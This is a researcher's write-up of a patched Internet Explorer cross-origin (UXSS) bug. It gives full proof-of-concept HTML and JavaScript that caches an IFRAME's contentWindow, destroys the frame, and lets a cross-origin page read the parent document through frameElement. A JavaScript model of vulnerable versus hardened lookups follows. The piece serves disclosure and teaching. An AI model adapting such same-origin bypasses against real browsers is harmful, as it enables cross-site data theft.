Another entry in the frameElement UXSS collection, but this one uses pure HTML — no Flash, XAML, or XML. The trick is to cache an IFRAME’s contentWindow, then destroy the IFRAME with outerHTML, and then use the cached contentWindow to load a cross-origin page. That page gets a live frameElement pointing back to the parent document.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xDom_CachedContentWindow_frameElement</title></head>
<body>
<font face="Tahoma" size="2">
<center><h1>xDom_CachedContentWindow_frameElement</h1></center>
<hr />
1) Cache the IFRAME Object (unused variable — just needs to be there):<br />
<font color="blue">unUsedCachedIframeObject</font> = document.all.<font color="blue">deadIframe</font>;<br /><br />
2) Cache the contentWindow:<br />
<font color="red">cachedContentWindow</font> = document.all.deadIframe.<font color="red">contentWindow</font>;<br /><br />
3) Kill the IFRAME with outerHTML:<br />
document.all.<font color="blue">deadIframe</font>.<b>outerHTML</b> = "RIP - A long time ago, there was an IFRAME here.";<br /><br />
4) Use cachedContentWindow to load a different-domain page:<br />
<font color="red">cachedContentWindow</font>.<b>name</b> = "<font color="green"><b>DEAD_IFRAME</b></font>";<br />
<font color="red">cachedContentWindow</font>.<b>open</b>("http://anydomain.com/anyfile.html", "<font color="green"><b>DEAD_IFRAME</b></font>");<br /><br />
5) That page can now read frameElement.<br /><br />
<hr />
<center>
<iframe id="deadIframe" src="" width="400" height="200"></iframe><br /><br />
</center>
</font>
<script language="JavaScript">
unUsedCachedIframeObject = document.all.deadIframe;
cachedContentWindow = document.all.deadIframe.contentWindow;
document.all.deadIframe.outerHTML = "RIP - A long time ago, there was an IFRAME here.";
cachedContentWindow.name = "DEAD_IFRAME";
cachedContentWindow.open("http://www.iframe.com/crash/20/I_SHOUD_BE_IN_A_DIFFERENT_DOMAIN.html", "DEAD_IFRAME");
</script>
</body>
</html>
I_SHOUD_BE_IN_A_DIFFERENT_DOMAIN.html:
<script language="JavaScript">
alert(frameElement.ownerDocument.body.outerHTML);
</script>
The IFRAME is removed from the DOM with outerHTML, but the cached contentWindow keeps the navigation channel open. Loading a cross-origin page through that channel leaves the page’s frameElement pointing to what was the IFRAME’s slot in the parent document. IE also needs the unused unUsedCachedIframeObject variable to be set — without it, the technique doesn’t work, suggesting the IFRAME object itself also needs to be retained in memory.
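As an added illustration, not part of the original post and not any browser's real code, the two checks a correct frameElement lookup has to make, shown beside the unchecked lookup the post relies on, in a small JavaScript model of the objects involved; every name in it (makeDoc, makeFrame, replay, the example hosts) is hypothetical.

```javascript
// Origin = scheme + host + port; all three must match.
function sameOrigin(a, b) {
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

function makeDoc(origin) {
  return { origin, body: '<body>' + origin.host + '</body>' };
}

// An IFRAME element plus its browsing context (what contentWindow returns).
function makeFrame(ownerDocument) {
  const frame = { ownerDocument, isConnected: true };
  frame.contentWindow = { container: frame, document: null };
  return frame;
}

// Vulnerable: hand back whatever container the context remembers, even after
// `outerHTML = "..."` has taken that element out of the tree.
function frameElementVulnerable(ctx) {
  return ctx.container;
}

// Hardened: null unless the element is still in a tree and the embedding
// document is same-origin with the document currently inside the frame.
function frameElementHardened(ctx) {
  const el = ctx.container;
  if (!el || !el.isConnected || !ctx.document) return null;
  return sameOrigin(el.ownerDocument.origin, ctx.document.origin) ? el : null;
}

// Replays the post's sequence and returns what the framed page could read
// through frameElement.ownerDocument.body, or null when access is refused.
// With crossOrigin = false the frame stays attached and same-origin, the
// legitimate case a fix must keep working.
function replay(getter, crossOrigin = true) {
  const parentOrigin = { scheme: 'http', host: 'parent.example', port: 80 };
  const otherOrigin = { scheme: 'http', host: 'other.example', port: 80 };
  const frame = makeFrame(makeDoc(parentOrigin));
  const cachedContentWindow = frame.contentWindow;      // step 2: cache it
  if (crossOrigin) frame.isConnected = false;           // step 3: kill the IFRAME
  // step 4: navigate through the cached context; a new document now lives there
  cachedContentWindow.document = makeDoc(crossOrigin ? otherOrigin : parentOrigin);
  const el = getter(cachedContentWindow);               // step 5: frameElement
  return el ? el.ownerDocument.body : null;
}
```

Running replay with each getter shows the unchecked lookup handing the parent body to the cross-origin page, while the checked one returns null there and still returns the element for an attached, same-origin frame.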
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.